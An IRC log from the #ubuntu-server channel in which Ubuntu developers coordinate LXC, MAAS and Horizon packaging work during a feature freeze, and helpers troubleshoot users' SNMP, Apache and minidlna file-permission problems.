<phaidros> RoyK: thats as far as I came as well, but I seem to be not understand what exactly to do with idmapd in my case. is there any way to just map a specific group?
<RoyK> it's in the docs
<smoser> jibel, would you consider lp:~smoser/+junk/qatracker for merge?
<jibel> smoser, will do
<T3CHKOMMIE> Hey guys, I am trying to configure SNMP v2 on my ubuntu server so that my Zenoss device can manage and monitor it. But for some reason i cant get snmp to work... or even do a MIB walk on it. anyone have any ideas or links for setting up snmp 2 on ubuntu server 12.04? thanks.
<hallyn> jamespage: can you test with qemu-kvm from ppa:serge-hallyn/virt for grub timeout?
<hallyn> (I can't test on the intel right now, and the amd doesn't reproduce :)
<jamespage> hallyn, LGTM - 2000 second countdown looking OK
<hallyn> jamespage: \o/
<hallyn> thanks.  lemme check release schedule to see if i should sned it to -proposed or wait for freeze to end
<jamespage> hallyn, I'd just hold it until freeze lifts
<jamespage> won;t be that long now methingks
<hallyn> jamespage: is that today?
<jamespage> yep
<hallyn> still waiting for page to load
<jamespage> but not yet
<hallyn> ok, cool.
<hallyn> thx - ttyl :)
<hallyn> stgraber: alas, setting up read-only root in lxc is problematic.  if we do it before pivot_root, we can't create and remove the put_old dir.  If do it after, we need to at least provide lxc-start with the ability to remount / ro, which we don't want
<hallyn> at least, we don't want that until we can tell apparmor to only allow that after pivot_root
<hallyn> jjohansen: ^ there was some sort of labeling coming down the pipline which should allow that right?
<stgraber> hallyn: Well, we never want to allow the container to remount / read-only, though remounting it read/write shouldn't be a problem right?
<hallyn> stgraber: right, but this would be lxc-start mounting it readonly
<hallyn> but still , it's '/'.  i dont' want it being able to muck with that
<stgraber> yeah...
<hallyn> unless we can label it beofre pivot_root, and allow it by label
<hallyn> so i think i'll finish the code minus apparmor and stash it in a bzr tree for now
<hallyn> until we can talk with jjohansen
<Daviey> roaksoax: Remember B1 doesn't include your latest upload.  Can you work with smoser to get refreshed released notes?
<Daviey> ta
<hallyn> stgraber: stashed in lp:~serge-hallyn/ubuntu/quantal/lxc/lxc-guest-start-roroot for now
<jjohansen> hallyn: not for quantal, there will be a new version with things you want post quantal
<smoser> jibel, http://paste.ubuntu.com/1189241/
<smoser> any ideas on that ?
<roaksoax> Daviey: sure
<roaksoax> smoser: ^^
<roaksoax> smoser: what are the release notes so far regarding to maas?
<smoser> roaksoax, ""
<smoser> those are the release notes at https://wiki.ubuntu.com/QuantalQuetzal/TechnicalOverview/Beta1#preview reguarding maas
<hallyn> jjohansen: and that will let us explicitly label a path and refer to it by label after mungling the mounts tree?
<roaksoax> smoser: "New version of MAAS is available. This realease drops the usage of maas-provision, a subset of cobbler. Additionally, it provides its own DNS/DHCP server" or similar
<jibel> smoser,  probably because the build was marked 'Ready to release'
<jjohansen> hallyn: I don't know whether explicit labeling will make it yet but hopefully
<jibel> there are nicer ways to handle that than a traceback
<smoser> jibel, ok. that makes sense i guess.
<smoser> well, yeah, but that sfine.
<hallyn> jjohansen: great - thanks
<smoser> i was just testing some change sto my update script
<jjohansen> hallyn: however if its a file handle, delegation would be able to handle it
<roaksoax> smoser: known issues "The DHCP config file does not get written. (LP: #1046397)" -= Already fixed, waiting for the upload
<hallyn> stgraber: i want to write a lxc.conf(5) section on the hooks this afternoon.  (so i'll probably wait to push lxc until then)
<roaksoax> to be approved
<smoser> roaksoax, ok. i'll add that.
<hallyn> jjohansen: it's not.  i wonder if there is a way to use one for our purposes
<smoser> we should try to put together some 2 or 3 sentance blurb on maas.
<roaksoax> smoser: thanks
<smoser> as a feature / notable thing
<roaksoax> smoser: better yet "New version of MAAS is available. This realease has dropped the usage of maas-provision, and features its own, MAAS managed, DNS and DHCP server"
<hallyn> (moving to other laptop, biab)
<smoser> roaksoax, gracias.
<smoser> i'll update.
<stgraber> hallyn: ok
<RoyK> anyone that knows a good alternative to zimbra? I'm rather fed up with upgrade paths and whatnot
<viezerd> RoyK: Zarafa
<hallyn> stgraber: manpage pushed to ubuntu:lxc.  If you'd like to proofread, I'd appreciate it
<stgraber> hallyn: ok, will do
<hallyn> stgraber: oh no, did some of my commits get lost?  did i not push to ubuntu:lxc with 0210-lxc-destroy-rm-symlink: ?
<hallyn> gotta do lunch, will figure it out after.
<stgraber> hallyn: I pulled before pushing 0210-fix-debian-templates and it wasn't there, so it looks like you forgot to push that one to ubuntu:lxc
<hallyn> stgraber: ok will push it after lunch :)
<uvirtbot> New bug: #1046946 in cloud-init "None in cfgmnts second field gets converted to string" [Undecided,Confirmed] https://launchpad.net/bugs/1046946
<zul> smoser: ping cloud-init has ports.ubuntu.com right?
<stgraber> hallyn: manpage looks good. I'm assuming you'll remove the "not yet implemented" when pushing to your git branch.
<hallyn> right, and in pkg if/when FFE is approved
<stgraber> hallyn: doh, seems like you commited right before me ;)
 * stgraber pulls again
<stgraber> hallyn: pushed
<stgraber> hallyn: I granted you the FFe for pre-mount
<stgraber> hallyn: isn't bug 1046117 fixed by your last commit? I don't see the bug number in the changelog, so not sure.
<uvirtbot> Launchpad bug 1046117 in lxc "btrfs via symlink not working" [Medium,Triaged] https://launchpad.net/bugs/1046117
<smoser> zul, in quantal it should
<zul> smoser:  cool...just updating blueprints
<hallyn> stgraber: g'ah!  yes i didn't put the bug# in changelog
<hallyn> stgraber: by pushed, you mean to archive?  (not seeing that in email or rmadison yet)
<hallyn> (if no then it's fixable :)
<stgraber> hallyn: pushed as in commited to ubuntu:lxc. Before uploading, please apply the pre-mount change now that the FFe has been approved
<hallyn> stgraber: phew, and add bug#1046117 to changelog.  will do
<hallyn> stgraber: would you say it's a half-assed job to NOT have an option in the ubuntu template to automtically create an ecryptfs-backed container?
<hallyn> Or would you say doing so is teetering off the edge of the FFE?
<stgraber> hallyn: well, what I granted was an FFe for adding the hook to LXC, not for adding the ecryptfs option (which was just a valid use case for the hook)
<stgraber> hallyn: so if you want to also push the ecryptfs option, I'd recommend another FFe
<hallyn> stgraber: sensible.  thx
<lifeless> hallyn: ecryptfs is a new feature isn't it ?
<lifeless> hallyn: nvm, saw the rest of the discussion :)
<uvirtbot> New bug: #1040626 in keystone "Update user's default tenant partially succeeds without authz" [Critical,Fix committed] https://launchpad.net/bugs/1040626
<sbeattie> zul, can you or adam_g sponsor my keystone upload for bug 1040626?
<uvirtbot> Launchpad bug 1040626 in keystone "Update user's default tenant partially succeeds without authz" [Critical,Fix committed] https://launchpad.net/bugs/1040626
<zul> adam_g: do you wanna take this?
<Daviey> erm
<Daviey> zul: remember we are in freeze.
<zul> Daviey: yeah but its a security update
<Daviey> sbeattie: If this can wait until Friday, it can be part of the normal upload set
<Daviey> is that acceptable ?
<sbeattie> Daviey: yeah, totally cool
<Daviey> zul: quantal doesn't promise security rapid updates, right sbeattie ?
<sbeattie> no, not really, not while in development.
<sbeattie> friday is fine; I just want to make sure it's on your team's radar.
<Daviey> sbeattie: thanks!
<Daviey> smoser: thanks for the overview updates
<smoser> looking at maas test ephemeral now.
<adam_g> zul: sure
<adam_g> ill at least look at it
<smoser> hallyn, around ?
<smoser> utlemming tells me that the 'admin' group is deprecated post 12.04 (or possibly *in* 12.04).  IIRC when kvm is installed it installs members of admin into kvm.
<smoser> our cloud-images do not have ubuntu in 'admin' any more, so additional action is then required to get them into kvm.  that said, if i *did* recall correctly that kvm looks at members of the admin group to add them to kvm group automatically, then it should probably update that to look at sudo
<smoser> or maybe not
<smoser> Daviey, ping
<smoser> https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1031090 . i'm seeing that (i htink) on canonistack
<uvirtbot> Launchpad bug 1031090 in linux "kvm_intel not loadable in a quantal guest" [High,Fix released]
<smoser> http://paste.ubuntu.com/1189514/
<Daviey> smoser:
<Daviey> smoser: you will, there are both arches... I bisected the kernel to try and find the commit via canonistack
<Daviey> smoser: i am assuming that canonistack hasn't rebooted into the new kernel today
<Daviey> (note the released date)
<hallyn> smoser: checking
<hallyn> smoser: in q it d
<Daviey> adam_g: hey.. your horizon branch.. did you forget a bzr add?
<hallyn> doesn't do that at all
<smoser> hallyn, so it just doesn't add any users, you *have* to add users to kvm group
<smoser> thats fine.
<hallyn> in precise too, it looks like.  still checking
<adam_g> Daviey: whihc file? let me check
<adam_g> Daviey: dont think so. my local branch is clean
<Daviey> adam_g: but your diff doesn't seem to include everything?
<Daviey> adam_g: hmm.. seeing more than i did this morning.. shrug
<adam_g> Daviey: strange.
<adam_g> Daviey: so that lets us ship something that works with compression disabled, and user install node-less, enable compression and it just works. im going to push the patch upstream and see if we can enable that ability there
<Daviey> adam_g: Hmm.. why do we need to have pre-generated css... is that because it's statically served ?
<sarthor> Hi, I searched for the appropriate howto on the Internet, but I am not lucky to find some guide that cover my needs, What I Want! I want to host my real domain and website on my locale computer, While my IP is dynamic, I am having 8 mb DSL line, I want to do this stuff on ubuntu-server, Need help please.
<adam_g> Daviey: yes, with compression disabled it needs to be statically served. when enabled, it invokes lessc to compile horizon.less into a dynamic .css that gets served
<Daviey> adam_g: but still runs throug django?  or direct from apache?
<adam_g> Daviey: its served from the static url via apache. its generated by django -> compressor -> lessc -> /usr/share/openstack_dashboard/static/dashboard/css/$some_hash.css
<adam_g> the first request generates it
<Daviey> ahh
<Daviey> adam_g: it's not possible to serve uncompressed css?
<Daviey> ie.. inefficient css..
<Daviey> adam_g: I hoped, django.conf.settings.COMPRESS_ENABLED = False.. would mean that it would just work.. without needing a static file shipped
<adam_g> Daviey: its not necesarilly compressed, horizon.less  is  compiled using lessc from a library of less snippets.
<Daviey> adam_g: right.. but the unanswered question.. does django-compressor allow serving of the snippets?
<Daviey> ie, by using inheritance imports within the css.. rather than flattening it?
<Daviey> (without node)
<sarthor> Hi, I searched for the appropriate howto on the Internet, but I am not lucky to find some guide that cover my needs, What I Want! I want to host my real domain and website on my locale computer, While my IP is dynamic, I am having 8 mb DSL line, I want to do this stuff on ubuntu-server, Need help please... my webserver is running and UP,
<arrrghhh> sarthor, we can help - but honestly if you look at things like overall cost and return on investment a hosted solution is MUCH better
<arrrghhh> because what if your ISP doesn't allow port 80 traffic?  or if your uplink is slow?  perhaps if your internet goes down?  all these things will cause your website to fail to customers.
<sarthor> arrrghhh: I am a learner, I have proxmox installed, and really I can play arround.
<arrrghhh> ok then what's the issue assuming you realize the limitations?
<sarthor> any my ISP allow that, because I can brows via my IP.
<adam_g> Daviey: i dont believe,  when the snippets shipped wiht source are in the .less format and not .css.
<arrrghhh> sarthor, ok?  so you need a domain name?  have you purchased one or are you going to use something like dyndns?
<sarthor> arrrghhh: I have already.
<sarthor> arrrghhh: I have a dyndns paid account too. and i have a purchased domain too on sitegrouend registrar
<Daviey> adam_g: yes.. but my hope was that django-compressor would DTRT, and render uncompressed... I guess i was too hopeful?
<arrrghhh> sarthor, so... what's the issue?  please ask a question.
<adam_g> Daviey: that is true of javascript, but not css
<Daviey> ah, ok.
<Daviey> adam_g: where did you learn that
<Daviey> adam_g: just by doing it?  or reading something?
<sarthor> arrrghhh: how to tell to word to go to my local computer for http://mydomain.com?
<Daviey> adam_g: incidentally, django-compress seems to have been superseeded by django-pipeline
<Daviey> \o/
<arrrghhh> sarthor, how to tell to word?
<sarthor> arrrghhh: I do not have static IP.
<adam_g> Daviey: that is true of javascript, but not css. i guess lessc can also minify it
<sarthor> arrrghhh: world*
<adam_g> Daviey: for css it uses an external tool (configurable, in this case node-less) to convert something into CSS and caches it by hash, then serves that $hash.css statically until it needs to be regenerated.
<adam_g> er
<arrrghhh> sarthor, a static IP is going to be very helpful - but if you don't have one, you'll have to get a service like dyndns (which you said you have?) to update your IP
<adam_g> Daviey: just spent time yesterday putting together that patch and trying to understand what we're trying to solve :)
<arrrghhh> so whenever your IP changes, the dyndns client will update your web site
<sarthor> arrrghhh: I send you private messange
<sarthor> I sent *
<Daviey> adam_g: so, django-pipeline supports node/less AND YUI.. I wonder if it's drop in alternative ?
<adam_g> Daviey: eek
<Daviey> Oh wait, that is a compiler, rather than a compressor
<Daviey> adam_g: http://django-pipeline.readthedocs.org/en/latest/index.html
<arrrghhh> sarthor, FYI, you should typically ask first before PMing someone - ask if it's OK that you PM them.
<Daviey> So.. CSS needs a *compiler* to make it use uncompressed stuff.
<adam_g> Daviey: yes, there are others out there but i believe we're dealing with a lessc specific source
<sarthor> arrrghhh: I am sorry, Next I will not do like that. I am sorry
<arrrghhh> no worries.  just IRC etiquette.
<Daviey> adam_g: ok
<adam_g> Daviey: talking to someone who knows more than me. might be an alternative to carrying a patch, but either way i think we'll still need to ship something compiled
<Daviey> adam_g: ok, yeah.. I wonder if we can do something smart to notify us if we need refresh it?
<Daviey> ie, as part of the CI.. do a diff of our static one.. and see if it is the same?
<Daviey> adam_g: we should probably also start looking at python-django-pipeline to do this, rather than -compressor which seems to be deprecated
<stgraber> hallyn: http://paste.ubuntu.com/1189612/ now in python :)
<hallyn> stgraber: wow - awesome - fast!
<hallyn> has beta been released yet?  i'm itchin to push lxc and qemu-kvm :)
<stgraber> hallyn: yep, archive is unfrozen
<hallyn> yay
<stgraber> hallyn: oh, just realized that with the code I'm playing with, my "ephemeral" containers can be persistent ;)
<stgraber> hallyn: as in, you can start them using overlayfs, then shut them down, then start them again
<stgraber> the overlay will just re-assemble at start up time
 * stgraber adds a --keep-data option to bypass the post-stop hook wiping the container
<hallyn> stgraber: excellent
<uvirtbot> New bug: #1047040 in qemu-kvm (main) "kvm crashed - memory corruption" [Undecided,New] https://launchpad.net/bugs/1047040
<stgraber> hallyn: hmm, looks like I'll need that new LXC to test my code ;) I kinda need pre-mount hooks for what I want to do
<hallyn> stgraber: pushed about 5 mins ago, should be building
<stgraber> hallyn: cool
<stgraber> hallyn: I'm going to need to allow overlayfs and aufs in the start-container profile, though that should be safe anyway
<hallyn> stgraber: np.  you can see from my blog post i also needed to add ecryptfs to that profile
<hallyn> stgraber: the lxc blueprint has me down for a server guide section on the API.  Uh, should i postpone that, or put your name by it?
<stgraber> hallyn: I wouldn't spend too much time on documenting the API at this point, though mentioning that it exists and that a python module is now shipped with an example (in /usr/share/doc/python3-lxc/examples/) might still be worth doing
<hallyn> all right
<hallyn> Hopefully I'll have time next week to work on the server guide.
<ScottK> http://en.wikipedia.org/wiki/File:LART.png
<thatotherguy> I'm a newb with apache
<thatotherguy> I'm trying to setup an alias for a site that I just restored from backup and I don't have a /pub directory but the original server config did.  Do I just create a /pub directory and use alias in apache config to redirect to the real new location?
<thatotherguy> I redirected but didn't create a /pub directory
<thatotherguy> seems to work but have been getting transient errors
<stgraber> hallyn: still around?
<stgraber> hallyn: I'm getting something really weird here
<hallyn> stgraber: i was walking away :)
<thatotherguy> Anyone good with apache
<stgraber> hallyn: I'm not sure of exactly what the issue is, but after I set lxc.rootfs and a bunch of other keys, call save_config() and start(), I'm getting part of the path duplicated
<stgraber> hallyn: basically /var/lib/lxc/tpl-precise-amd64-jb0qqn becomes /var/lib/lxc/tpl-precise-amd64-jb0qqn-jb0qqn
<hallyn> in the written-out configuration file?
<stgraber> hallyn: if I drop my start() call and just use lxc-start manually, it works fine. So it looks like start() corrupts the config and writes it to disk again
<stgraber> before starting with the wrong config
<hallyn> hm, crud
<stgraber> hallyn: http://paste.ubuntu.com/1189813/ is what I'm using
<stgraber> hallyn: running it will get you a failure with the "corrupted" /config in /var/lib/lxc/<name>
<thatotherguy> Anyone good with apache
<stgraber> hallyn: if you comment the part of the code calling start() and check the files, they'll be fine and lxc-start -n <name> will work fine
<hallyn> hm, i don't see why
<hallyn> was worrying that &conf was being re-initialized, bu it's not
<stgraber> hallyn: can you reproduce the issue on your side? (want to check that it's not my system being completely broken somehow ;))
<hallyn> stgraber: feh, why do i have to enter my credentials to get the plaintext version
<hallyn> and then your name crashed python
<stgraber> hallyn: you need python3
<stgraber> and if it still crashes under python3, then use LANG=C.UTF-8 ;)
<stgraber> though I'd think your current LANG is en_US.UTF-8 which is perfectly capable of parsing my name with python3 :)
<uvirtbot> New bug: #1047080 in geronimo-jms-1.1-spec (main) "Jar names differ between Debian and Ubuntu builds" [Undecided,New] https://launchpad.net/bugs/1047080
<hallyn> stgraber: didn't reproduce, actually
<hallyn> stgraber: though permissions are too tight...
<hallyn> oh wiat
<hallyn> right it does fail to start. the config file is fine, but presumably in memory it's bad?
<hallyn> stgraber: I gotta run soon, but will try to figure this out
<stgraber> hallyn: what do you have for lxc.rootfs in config?
<hallyn> lxc.rootfs in config *file* is fine
<hallyn> but it did fail to start
<hallyn> lxc.rootfs = /var/lib/lxc/p1-6jgceb/rootfs
<stgraber> oh, I guess you're missing hte apparmor entries
<stgraber>   # required by lxc-start-ephemeral
<stgraber>   mount fstype=overlayfs,
<stgraber>   mount fstype=aufs,
<stgraber> in /etc/apparmor.d/abstractions/lxc/start-container
<stgraber> + sudo /etc/init.d/apparmor reload
<hallyn> d'oh
<joemyfriend> I'm having problem with my apache alias config
<joemyfriend> Anyone able to help?
<hallyn> stgraber: d'oh!
<hallyn> netns bug
<hallyn> i'll have to reboot before i try again,
<stgraber> gah...
<hallyn> gah indeed
<stgraber> that bug is getting annoying :)
<hallyn> yeah
<hallyn> it's gonna be a rough month - lots of subtle bugs to squas in q
<hallyn> all right, i'm leaving for some dinner.  i'll reboot while gone, and retry tonight
<hallyn> so far really seeing no reason this should be happening to you :(
<hallyn> ttyl
<oApocalypse> minidlna support needed
<oApocalypse> i have it up and running on my ubuntu server version 12
<oApocalypse> four folders shared in the config file
<oApocalypse> only the folder that is on my os drive is showing up the other three are on my external hard drive everytime i try to restart the service it reads directory not found
<oApocalypse> you guys make me sad there are far to many people here not to help a poor uneducated linux user
<protoCall7> Hi all, on my new Ubuntu 12.04 server machines, I've noticed a ton of messages in the logs from SSHD: Sep  6 15:02:22 rarch-002 sshd[2919]: Connection closed by 10.30.0.123 [preauth]
<protoCall7> we're not noticing any problems with sshd, can anyone verify that these are normal?
<protoCall7> I would like to add them to log check.ignore if there isn't a problem
<oApocalypse> lol no one is here
<protoCall7> lol there are plenty of people here, they're just occupied with other things, and no one without a direct answer for your question is going to BS you
<protoCall7> just be patient and you'll get an answer ;)
<protoCall7> sometimes it takes me a few hours, so I just ask, and get back to working on other things
<oApocalypse> yea ive been watching tv :P
<oApocalypse> you know anything about dlna services
<protoCall7> as far as your problem above, I haven't used dlna, but are you only restarting the minidlna service, or the whole machine?
<oApocalypse> restarting the service
<protoCall7> interesting.  as I said, I don't know anything about that service, but my first guess was going to be that you needed to put entries into /etc/fstab for the external drive, but unless that service is unmounting the drives for some reason, that wouldn't be the problem :-/
<oApocalypse> yea i have the drives shared currently
<oApocalypse> through samba
<oApocalypse> ive been watching said items off the hd from multiple computers
<protoCall7> :)
<oApocalypse> and its not giving me permission issues
<protoCall7> I can see where losing those drives every time you restart the service would get mighty annoying though
<oApocalypse> quite
<oApocalypse> but the shared drives are still reachable just not through minidlna
<protoCall7> thats a strange one.  Once you're in that state, what do you have to do to get minidlna to see them again?
<oApocalypse> problem is they dont see them at all
<oApocalypse> it sees the one folder off my os drive
<oApocalypse> but none of the three on my external
<oApocalypse> maybe its a discrepency in the path that i am providing
<oApocalypse> brb
<oApocalypse> if its on another drive would i have to designate?
<protoCall7> ok, so I'm a bit confused on one point here.  Is this external drive hooked up to the same machine that is running minidlna (e.g. a USB ext hdd), or is this like a samba share from another box?
<oApocalypse> same box
<protoCall7> ok, and is the disk mounted?
<oApocalypse> hd is in the server
<oApocalypse> not external
<oApocalypse> misspoke
<protoCall7> ok, so to be clear, the external drive is connected to the same machine that minidlna is running on, however minidlna is not sharing the data from the external drive, only the one folder you have configured on the internal drive?
<oApocalypse> correct
<protoCall7> okay, and is the external drive mounted?
<oApocalypse> and i am truly a novice at this
<oApocalypse> yes
<protoCall7> ok, what path is it mounted to?  likeâ¦ /mnt/externaldrive or something of that sort?
<oApocalypse> a command i can put in to show what ur looking for
<oApocalypse> ?
<protoCall7> just type mount and copy me the output to start :)
<protoCall7> no arguments or anything
<oApocalypse> dev/mapper/Exousia-root on / type ext4 (rw,errors=remount-ro)
<oApocalypse> proc on /proc type proc (rw,noexec,nosuid,nodev)
<oApocalypse> sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
<oApocalypse> none on /sys/fs/fuse/connections type fusectl (rw)
<oApocalypse> none on /sys/kernel/debug type debugfs (rw)
<oApocalypse> none on /sys/kernel/security type securityfs (rw)
<oApocalypse> udev on /dev type devtmpfs (rw,mode=0755)
<oApocalypse> devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
<oApocalypse> tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
<oApocalypse> none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
<oApocalypse> none on /run/shm type tmpfs (rw,nosuid,nodev)
<oApocalypse> /dev/sda1 on /boot type ext2 (rw)
<oApocalypse> /dev/sdb1 on /Shared type ext4 (rw)
<lifeless> !pastebin | oApocalypse
<ubottu> oApocalypse: For posting multi-line texts into the channel, please use http://paste.ubuntu.com | To post !screenshots use http://imagebin.org/?page=add | !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic.
<oApocalypse> sorry :(
<protoCall7> ok, so /Shared is your external drive, correct?
<oApocalypse> yes
<protoCall7> okay, and can you paste the relevant lines from the configuration file for minidlna where you've configured that share? (using paste bin this time ;))
<oApocalypse> lol
<oApocalypse> dont wanna get yelled at again
<oApocalypse> http://paste.ubuntu.com/1189890/
<oApocalypse> does that seem correct
<protoCall7> except for line 16
<protoCall7> this won't fly because of the space: /Shared/Share/Torrents/TV Shows
<oApocalypse> go on
<protoCall7> try writing it as follows:  /Shared/Share/Torrents/TV\ Shows
<protoCall7> to escape that space
<oApocalypse> should i just change the name of the folder to TV_Shows
<protoCall7> that would make it easier any time you need to use that directory from the command line, that's for sure
<oApocalypse> ok
<oApocalypse> but why wouldnt line 14 and 15 work
<protoCall7> those look right to me, by the example given in the config.  Is there anything relevant in the logs?
<oApocalypse> there are logs?
<oApocalypse> lol want me to give you the error message ?
<protoCall7> yes pls :)
<oApocalypse> http://paste.ubuntu.com/1189900/
<protoCall7> ls -lsa /Shared/Share/Torrents
<protoCall7> please
<oApocalypse> http://paste.ubuntu.com/1189902/
<protoCall7> sudo chmod +r /Shared/Share/Torrents/Movies
<protoCall7> then restart that service again and see if it still complains about Movies
<protoCall7> my guess is that minidlna is starting as a non-priviledged user, and doesn't have read permissions on that directory
<oApocalypse> still issue
<protoCall7> Ohh, the directory above it is accessible by root only as well
<protoCall7> ps aux | grep dlna
<oApocalypse> that does?
<protoCall7> lets just make sure that it's running as a non-priv user before i go having you mess with permissions
<oApocalypse> minidlna runs an unknown user
<protoCall7> that is going to show all running processes on the machine along with who is using them
<protoCall7> yup, so if its not running as root, it doesn't have read permissions to access those dirs
<protoCall7> you could always do a:
<protoCall7> sudo chmod -R +r /Shared
<protoCall7> which will enable read access for that entire directory and everything in it
<protoCall7> if you need to limit read access to that dir, you'll have to be a bit more selective
#ubuntu-server 2012-09-07
<oApocalypse> this only gives it read access then correct?
<protoCall7> as long as you only do +r
<protoCall7> the -R is recursive so it will effect everything under that directory too
<oApocalypse> still same error
<protoCall7> really, can you do another ls -lsa /Shared/Share/Torrents/ pls?
<oApocalypse> http://paste.ubuntu.com/1189917/
<protoCall7> oops, sorry, I forgot that directories need the x permission too lol.  sudo chmod -R +x /Shared
<protoCall7> "Execute permission on a directory means you can list the files in that directory"
<oApocalypse> HEY
<protoCall7> :)  lookin better?
<protoCall7> ?
<oApocalypse> no error now
<protoCall7> thats a good start lol, can you access your media from other devices now?
<oApocalypse> lol no files to be found
<oApocalypse> but we are heading in the right direction
<protoCall7> most definitely
<protoCall7> I'll be back in just a few
<oApocalypse> ok ill play more
<stgraber> hallyn: found the problem, it's the sed call in pre-mount
<stgraber> hallyn: that's altering the config file and breaking everything...
<protoCall7> oApocalypse:  I'm gonna head home from my datacenter, but I'm in this channel any time my laptop is online, so feel free to send me a PM if theres anything else I might be of assistance with
<oApocalypse> ok ty for your help
<protoCall7> any time, gl
<oApocalypse> i need it
<stgraber> hallyn: well, will still need you to take a look... now the container gets created fine, starts/stops with lxc-start/lxc-stop just fine but can't get started from python/API
<stgraber> hallyn: it says the pre-mount hook failed to run, but adding some debug to the script, it clearly worked and returned 0
<arrrghhh> oApocalypse, http://en.wikipedia.org/wiki/Filesystem_permissions#Notation_of_traditional_Unix_permissions <-- very helpful for me
<Daviey> adam_g: how do you setup horizon without the headache of keystone/nova to test your changes?
<oApocalypse> ty :)
<arrrghhh> np
<stgraber> hallyn: updated script at http://paste.ubuntu.com/1189928/, run as python3 script.py -o <orig> -k
<stgraber> hallyn: it should fail, then try to lxc-start the failed container, that should work fine
<adam_g> Daviey: i have no idea.  i install the package on an instance on my local openstack cluster, and just update /etc/openstack-dashboard/settings.py to find the keystone server and everything else is magick
<stgraber> hallyn: lxccontainer.log doesn't tell me why lxc-start works and start() doesn't... my guess being that it's related to the hooks
<Daviey> adam_g: lardie-dah.. local cloud eh?  very posh :)
<stgraber> hallyn: apparmor doesn't show any reject here, so it's unlikely to be that either
<Daviey> adam_g: yeah.. doing it at debuild -S time will always ensure that we have a correct css/js compression
<adam_g> Daviey: i dont follow
<Daviey> adam_g: one moment
 * Daviey wishes he wasn't sat in the dark
<smoser> Daviey, does thatbaically mean generating the css/jss compression in 'debian/rules clean'
<Daviey> smoser: well.. that is what i was checking.. i think so, yes
<Daviey> I wanted to see if there was another entry point.
<smoser> http://www.debian.org/doc/manuals/maint-guide/build.en.html
<smoser> yeah, i didn't see anything either.
<smoser> i do think that i've seen unpatch called
<smoser> or reverse-pathces or something
<smoser> clean seems strange, but i think the abuse is reasonable. and you can have configurable to disable if you'd like
<Daviey> smoser: wait.. ./configure is often run.. is that via clean?
<smoser> really?
<smoser> that seems completely broken in a build source
<Daviey> I'm sure i had seen that on a few packages
<stgraber> hallyn: log when using lxc-start (working): http://paste.ubuntu.com/1189939/
<stgraber> hallyn: log when using the API (failing): http://paste.ubuntu.com/1189940/
<Daviey> smoser: rules clean, runs dh_clean, which runs dh_testdir
<Daviey> smoser: ahh.. scrub that, irrelevant.. i think what i have seen is 'broken' make files.. where "make clean" does a ./configure aswell
<Daviey> so handled by upstream, rather than packaging
<Daviey> smoser / adam_g: "clean target: to clean all compiled, generated, and useless files in the build-tree" lol... we want to do the opposite :)
<adam_g> Daviey: generating this stuff requires installation of node-less.
<adam_g> that would then make node-js  a build dependency and we're back at square one, no?
<Daviey> adam_g: no, it's a source package creation requirement
<Daviey> not a build-dep
<Daviey> ie, you need it on your machine... but the buildd's don't
<adam_g> Daviey: ah, cool
<adam_g> Daviey: let me figure out a good way to ship this stuff, and then we can come up with a good way to generate it
<Daviey> smoser: what do you know of source format, 3.0 (custom)?
<Daviey> (perhaps overkill)
<Daviey> adam_g: ok, cool
<Daviey> smoser: ah, debian bug 246918 .. not quite what i hoped
<uvirtbot> Debian bug 246918 in dpkg-dev "dpkg-source may have an option to get .diff.gz from a custom source" [Wishlist,Fixed] http://bugs.debian.org/246918
<Daviey> smoser: the definition made it sound ideal.. "This format is particular. It doesn't represent a real source package format but can be used to create source packages with arbitrary file"
<oApocalypse> anyone familiar with minidlna
<oApocalypse> it appears to properly sharing the folders i have provided but it doesnt seem to be showing the contents of hte file
<stgraber> hallyn: AFAICT from the leftovers, the pre-mount script is actually run, the container is failing right after for some unknown reason
<ajmitch>  /win 26
<hallyn> stgraber: ok so the malforned rootfs was due to sed, but you're still having trouble?
<stgraber> hallyn: yep
<stgraber> hallyn: the resulting container boots fine with lxc-start but doesn't from the API
<stgraber> hallyn: I pasted the current version of my code and the lxc log for a working (lxc-start) and non-working (API) start(0 call
<hallyn> i saw the logs but missed the code
<stgraber> hallyn: http://paste.ubuntu.com/1189928/,
<hallyn> may be something i'm not executing in api that gets done in lxc_start
<hallyn> thx, looking
<stgraber> the good thing is that with all these tests, the API will be very well tested even before it gets merged upstream ;)
<hallyn> stgraber: so after you create one of these, even if you start a new python3, import lxc, and create a new Container() instance for that container, it still won't start?
<stgraber> correct
<stgraber> I tried with "import lxc; lxc.Container("name").start()" and it'd still return False with similar log entries
<stgraber> so it's apparently not something being messed up with the in memory structure
<stgraber> (or it's messed up enough that it gets back to the wrong state even when reading the config from scratch)
<hallyn> stgraber: i'ts not leaving a /var/lib/lxc/p1-ex274c behind for me to look at
<hallyn> (but destroy is commented out)
<hallyn> BTW - can i just say i HATE the python3 'print()'
<stgraber> hallyn: did you use -k?
<stgraber> hallyn: otherwise it'll get wiped out by the post-stop hook
<hallyn> no i didn't :)  i just did this to easily look at the hooks :)
<hallyn> stgraber: looks like maybe an error in lxc_run_script(), bc i put 'exit 0' at the end, a print right above that to confirm we're getting there, but it still says returning error in container.log
 * hallyn looks
<stgraber> yeah, that matches what I've seen here when trying to trace the hook to see where it failed (to notice it didn't actually fail at all and was run just fine)
<hallyn> oh, no
<hallyn> i'm doing it wrong.  the 'c = lxc.Container("p1-ookuma')' already loads the config
<hallyn> then i re-load the cnfig
<stgraber> right, no need to call load_config on top of that, it'll just lead to duplicate network entries
<hallyn> stgraber: i note that lxc.mount is set to /var/lib/lxc/p1/fstab
<hallyn> (shouldn't matter)
<stgraber> yeah, I wasn't sure whether I wanted to mess with fstab at all, as it's supposed to be identical to the source anyway, might as well keep it pointing to the original one
<hallyn> stgraber: i think it's a bug in popen/pclose
<hallyn> building new lxc to instrument pclose
<hallyn> (racing against time, i must go in a few mins)
<hallyn> gr, compiler is getting downright fascist.  fine so i redefined ret.  what's it to you?
<stgraber> :)
<hallyn> hm, errno from pclose() is 'no child processes'
<stgraber> oh, that actually tells me exactly what the problem is
<stgraber> that totally sounds like my zombie handler in python3-lxc catching the SIGCLD before you do
<stgraber> right, so that's my fault then, will have to rethink how to deal with the zombie handler ;)
<hallyn> d'oh :)
<hallyn> i was worrying it was the way i was doing daemon().
